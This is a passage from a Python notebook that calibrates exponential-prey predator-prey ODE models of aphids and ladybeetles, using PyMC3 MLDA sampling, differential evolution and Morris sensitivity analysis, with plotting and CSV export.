# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP1_model",
EP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP1_model",
EP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
# Second coarse-level data set for MLDA: every 2nd observation.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
# NOTE(review): this coarse model is built but not passed to pm.MLDA below
# (only coarse_model_1 is) — confirm whether it should be in coarse_models.
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Prioris for Initial Conditions
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # lower=1 for consistency with fine_model_EP1 and coarse_model_1
    # (this block had lower=0, which also allows a degenerate sigma -> 0).
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP1_model",
        EP1_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
with fine_model_EP1:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_EP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[147]:
plt.hist(trace_calibration_EP1['a1'], bins=35)
plt.show()
# In[148]:
calibration_variable_names = [
"std_deviation",
"a1",
]
# In[149]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_EP1[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_EP1.png")
# In[150]:
az.plot_pair(
trace_calibration_EP1,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_EP1.png")
# In[151]:
df_stats_summary = az.summary(
data=trace_calibration_EP1,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[152]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the KDE-based most probable value (MPV) for each variable.

    Scalar variables contribute one dict entry keyed by their name; vector
    variables contribute one entry per component, keyed "name[index]".
    """
    rv_mpv_values_dict = {}
    progress_bar = tqdm(variable_names)
    for variable in progress_bar:
        progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
        rv_realization_values = pm_trace[f"{variable}"]
        # A 1-D trace is a scalar variable; 2-D means (draws, components).
        if len(rv_realization_values.shape) < 2:
            rv_mpv_values_dict[f"{variable}"] = _scalar_rv_mvp_estimation(
                rv_realization_values
            )
        else:
            num_of_dimensions = rv_realization_values.shape[1]
            for dimension in range(num_of_dimensions):
                variable_name_decomposed = f"{variable}[{dimension}]"
                component_values = np.array(rv_realization_values[:, dimension])
                rv_mpv_values_dict[f"{variable_name_decomposed}"] = (
                    _scalar_rv_mvp_estimation(component_values)
                )
    return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of *arviz_summary* with an extra "mpv" column.

    The column is aligned by index with the keys of *rv_modes_dict*
    (variable names as produced by calculate_rv_posterior_mpv); the
    input frame is left untouched.
    """
    summary_with_mpv = arviz_summary.copy()
    # pd.Series(dict) uses the keys as the index, so values align by name.
    summary_with_mpv["mpv"] = pd.Series(rv_modes_dict)
    return summary_with_mpv
# In[153]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_EP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_EP1.csv") # salvando em um csv para consultas
df_stats_summary
# In[154]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_EP1["EP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_EP1["EP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_EP1["EP1_model"], 50, axis=0)
# In[155]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_EP1.png", dpi=300)
plt.show()
# In[156]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_EP1.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_EP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[157]:
df_realizations
# # Exponential Prey Growth FR2 model
# ## The parameter a1 doesn't have a maximum threshold
# In[158]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
# JIT-compiled (numba, nopython) RHS of the EP2 system: exponential prey
# growth with a saturating rational predation term.
@jit(nopython=True)
def EP2_model(
    t,
    X,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Return (du/dt, dv/dt) for state X = (u, v) at time t.

    u' = r1*u - a1*u*v / (a2 + a3*u); v' = 0, i.e. the ladybeetle
    density is held constant in this model variant.
    """
    u, v = X
    u_prime = r1 * u - a1 * u * v / ( a2 + a3 * u )
    # Predator dynamics intentionally frozen: only the prey equation is fit.
    v_prime = 0
    return u_prime, v_prime
def EP2_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the EP2 system with LSODA over *t_span*, sampled at *t_eval*.

    Returns the scipy solve_ivp result object (fields .t and .y).
    """
    model_args = (r1, a1, a2, a3)
    return solve_ivp(
        fun=EP2_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=model_args,
        method="LSODA",
    )
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[159]:
def EP2_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual between simulated and observed series.

    Parameters
    ----------
    par : sequence
        Model parameters forwarded to *fitting_model* (r1, a1, a2, a3).
    time_exp : np.ndarray
        Experimental observation times; also used as the solver output grid.
    f_exp : sequence of two arrays
        Observed series (prey, predator).
    fitting_model : callable
        ODE solver with signature (y0, t_span, t_eval, *params) returning an
        object with a .y attribute of shape (2, n_times).
    initial_conditions : sequence
        Initial state passed through to the solver.

    Returns
    -------
    float
        Mean over the two QoIs of the weighted sums of squared residuals,
        or 1e15 when the solver raises ValueError (penalizes infeasible
        parameter sets during global optimization).
    """
    args = par
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Solver failure (e.g. integration blow-up) -> large penalty so the
        # optimizer steers away from this parameter region.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Differential-evolution progress callback.

    Prints the current best parameter vector *xk* once per generation;
    *convergence* is supplied by scipy.optimize but is not used here.
    """
    print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[160]:
from scipy import optimize
seed = 1234
r1=0.000582078917707341
a1=0.020251827279105163
a2=1.4527465345998702e-05
a3=0.0024486050974377345
denom_min = 0.1
denom_max = 1.9
bounds_EP2 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_EP2 = optimize.differential_evolution(
EP2_least_squares_error_ode,
bounds=bounds_EP2,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
EP2_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_EP2)
# * Retrieving the calibrated parameter values:
# In[161]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_EP2.x
solution_ODE_EP2 = EP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_EP2.x
)
t_computed_EP2, y_computed_EP2 = solution_ODE_EP2.t, solution_ODE_EP2.y
u_EP2, v_EP2 = y_computed_EP2
parameters_dict = {
"Model": "EP2",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[162]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_EP2, u_EP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_EP2, v_EP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[163]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[164]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = EP2_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
EP2_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[165]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[166]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_EP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[167]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[168]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP2 = EP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP2.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[169]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Time-resolved Morris analysis: one ee_analyze() call per output time point.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize mu* and sigma so the stacked bars sum to 1 per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Skip time points where the Morris analysis fails (e.g. zero output
        # variance); rows left as NaN are dropped afterwards.
        # NOTE(review): was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[170]:
df_sigmai
# In[171]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_EP2.png", dpi=300)
plt.show()
# In[172]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_EP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[173]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate du/dt along a precomputed trajectory.

    Calls *ode_model* at each time point with the stacked state [u, v]
    and keeps the first (prey) component of the returned derivative pair.
    """
    derivatives = [
        ode_model(current_time, [u_array[t_idx], v_array[t_idx]], *model_pars)[0]
        for t_idx, current_time in enumerate(time_array)
    ]
    return np.array(derivatives)
# In[174]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_EP2,
u_EP2,
v_EP2,
EP2_model,
mean_values_params
)
pest_time_derivative_array
# In[175]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_EP2, u_EP2, '-x', label='Pest population')
plt.plot(t_computed_EP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_EP2.png", dpi=300)
plt.show()
# In[176]:
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[177]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP2 = EP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP2.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
EP2_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[178]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Time-resolved Morris analysis of the pest time derivative QoI.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize mu* and sigma so the stacked bars sum to 1 per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Skip time points where the Morris analysis fails (e.g. zero output
        # variance); rows left as NaN are dropped afterwards.
        # NOTE(review): was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[179]:
df_sigmai
# In[180]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_EP2.png", dpi=300)
plt.show()
# In[181]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_EP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[182]:
# Wrap the ODE solve as a Theano op so PyMC3 can use it as a deterministic
# node in the probabilistic graph. as_op provides no gradient, so only
# gradient-free samplers (e.g. MLDA, Metropolis variants) can be used.
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,  # time_exp
        t.dscalar, # r1
        t.dscalar, # a1
        t.dscalar, # a2
        t.dscalar, # a3
        t.dscalar, # u0
        t.dscalar, # v0
    ],
    otypes=[t.dmatrix]
)
def EP2_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
    """Solve the EP2 system over time_exp and return an (n_times, 2) array."""
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, a1, a2, a3]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        EP2_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t  # unused; kept for symmetry with other cells
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack prey/predator as columns to match the observations layout.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[183]:
# Observations and settings shared by the PyMC3 models below.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000  # NOTE(review): unused — pm.sample below hard-codes draws=4500
start_time = time.time()
percent_calibration = 0.95  # relative half-width used to build the uniform priors
# Fine-level model for MLDA: fitted against the full observation set.
with pm.Model() as fine_model_EP2:
    # Prior distributions for the model's parameters.
    # r1 and a2 are held fixed at their deterministic estimates via pm.Data;
    # the commented Uniform blocks show the previously tried alternative.
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # NOTE(review): upper bound hard-coded to 1e6 (original bound kept commented).
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + percent_calibration) * a1,
    )
    a2_ = pm.Data("a2", a2)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + percent_calibration) * a3,
    )
    # Priors for the initial conditions (held fixed at the observed values)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # one noise level per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "EP2_model",
        EP2_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse MLDA level 1: the same model fitted to every 4th observation,
# so coarse proposals are cheaper to evaluate than the fine model.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters (must mirror the fine model)
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6#(1.0 + percent_calibration) * a1,
    )
    a2_ = pm.Data("a2", a2)
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6#(1.0 + percent_calibration) * a3,
    )
    # Priors for the initial conditions (held fixed at the observed values)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
